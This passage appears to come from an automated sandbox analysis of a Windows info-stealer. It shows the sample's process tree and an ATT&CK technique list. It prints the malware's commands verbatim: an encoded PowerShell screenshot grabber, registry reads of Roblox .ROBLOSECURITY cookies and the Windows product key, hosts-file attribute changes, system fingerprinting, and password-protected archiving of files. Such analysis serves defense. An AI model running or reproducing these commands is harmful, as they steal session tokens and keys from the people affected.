    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:4980
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1220
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rkt2fkxp\rkt2fkxp.cmdline"
        5⤵
        
        PID:3244
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7C35.tmp" "c:\Users\Admin\AppData\Local\Temp\rkt2fkxp\CSCA56DE6D1AF5D49FCBCBCAC41BC1EE192.TMP"
        6⤵
        
        PID:2156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:1312
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:3656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:3400
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:5024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1436
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:460
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2132
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI22922\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\n8T1k.zip" *"
    3⤵
    PID:712
  - - C:\Users\Admin\AppData\Local\Temp\_MEI22922\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI22922\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\n8T1k.zip" *
      4⤵
      Executes dropped EXE
      PID:3156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:4312
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2532
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:1484
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1312
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4412
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:560
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1544
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:1264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:4648
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3776

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:3664

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:2852

C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:4
1⤵
PID:4432

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
PID:4648

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
1⤵
PID:4876

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Power Settings

T1653

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Ignore Process Interrupts

T1564.011

Impair Defenses

T1562

Modify Registry

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

System Information Discovery